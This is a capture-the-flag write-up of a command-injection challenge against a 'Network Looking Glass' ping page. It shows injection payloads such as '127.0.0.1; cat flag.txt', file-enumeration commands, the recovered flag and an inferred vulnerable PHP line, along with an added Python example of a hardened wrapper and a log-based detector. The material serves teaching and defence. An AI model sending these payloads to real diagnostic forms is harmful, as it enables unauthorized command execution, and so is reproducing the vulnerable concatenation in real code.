SCSC2026 Quals - Network Looking Glass - Web Exploitation Writeup

Category: Web Exploitation
URL: https://ctf.sriwijayasecuritysociety.com/
Flag: SCSC26{p1nG_p1nG_bU4t_NyUsUp_m4sUk}

Challenge Description

The challenge provided a web-based “Network Looking Glass” interface that lets users ping hosts. This kind of feature often becomes dangerous if user input is concatenated directly into a shell command.

Analysis

The page accepted a hostname/IP and returned the output of ping. That strongly indicates something like:

system("ping -c 1 " . $_GET["host"]);

If the input is not sanitized, we can try classic command injection separators such as ;, &&, ||, |, $(), and backticks.

Payloads I tested:

127.0.0.1; ls
127.0.0.1 && ls
127.0.0.1 | ls
127.0.0.1; `ls`

The semicolon (;) worked, confirming command injection.
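As an added illustration (not code from the writeup or the challenge), the snippet below puts the inferred vulnerable pattern next to a hardened version and then reuses the same allowlist as a log check. Everything in it is assumed: that the parameter is named host, that the fixed wrapper builds an argv list for subprocess instead of a shell string, that targets are limited to IP literals and RFC 1123 style hostnames, and the access-log lines are constructed. Nothing here runs ping; the functions return the command that would run so the behaviour can be checked offline.

```python
"""Vulnerable vs hardened ping wrapper, plus a log check built on the same
allowlist. All names, the `host` parameter and the log lines are constructed
for this example; none of it comes from the challenge."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Hostname grammar (assumption): dot-separated labels of letters, digits and
# hyphens, no leading or trailing hyphen, optional trailing dot, <= 253 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def vulnerable_command(host: str) -> str:
    """Mirror of the inferred PHP: system("ping -c 1 " . $_GET["host"]).
    Returns the string a shell would parse, so any separator in `host`
    becomes part of the command line."""
    return "ping -c 1 " + host


def is_valid_target(host: str) -> bool:
    """Allowlist check: accept only an IPv4/IPv6 literal or a plain hostname.
    Shell metacharacters, whitespace and a leading hyphen all fail."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(host))


def hardened_command(host: str) -> list:
    """Build the argv list for subprocess.run(argv) with shell=False.
    Raises ValueError for anything outside the allowlist; because the
    result is an argv list, even an accepted value is never shell-parsed."""
    if not is_valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return ["ping", "-c", "1", host]


# Constructed access-log lines (not from the challenge): two ordinary lookups
# followed by requests carrying the separators the writeup lists.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2026:10:00:01 +0000] "GET /?host=8.8.8.8 HTTP/1.1" 200 412',
    '10.0.0.5 - - [17/Feb/2026:10:00:05 +0000] "GET /?host=example.org HTTP/1.1" 200 420',
    '10.0.0.9 - - [17/Feb/2026:10:01:12 +0000] "GET /?host=127.0.0.1%3B+ls HTTP/1.1" 200 913',
    '10.0.0.9 - - [17/Feb/2026:10:01:40 +0000] "GET /?host=127.0.0.1+%26%26+ls HTTP/1.1" 200 910',
    '10.0.0.9 - - [17/Feb/2026:10:02:03 +0000] "GET /?host=127.0.0.1%3B+cat+flag.txt HTTP/1.1" 200 560',
]

_REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')


def flag_injection_attempts(log_lines):
    """Return (client_ip, decoded host value) for every request whose `host`
    parameter fails the same allowlist the hardened wrapper enforces.
    Running the validator over logs turns the mitigation into a detection."""
    hits = []
    for line in log_lines:
        m = _REQ_RE.match(line)
        if not m:
            continue
        client, _ts, target = m.groups()
        params = parse_qs(urlsplit(target).query)  # decodes %3B and '+'
        for value in params.get("host", []):
            if not is_valid_target(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    print(vulnerable_command("127.0.0.1; ls"))
    print(hardened_command("127.0.0.1"))
    for client, value in flag_injection_attempts(SAMPLE_LOG):
        print(f"suspicious host parameter from {client}: {value!r}")
```

The two defences are independent: the allowlist stops unexpected values at the edge, and passing an argv list means that even if the allowlist were loosened later, no shell ever interprets the value.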

Exploitation

After confirming injection, I enumerated for flag files and then read it:

127.0.0.1; ls -la
127.0.0.1; find / -name "flag*" 2>/dev/null
127.0.0.1; cat flag.txt

The output included the flag:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.012/0.012/0.012/0.000 ms

SCSC26{p1nG_p1nG_bU4t_NyUsUp_m4sUk}
Source: https://blog.rei.my.id/posts/23/scsc2026-quals-network-looking-glass-web-exploitation-writeup/
Author: Reidho Satria
Published at: 2026-02-17
License: CC BY-NC-SA 4.0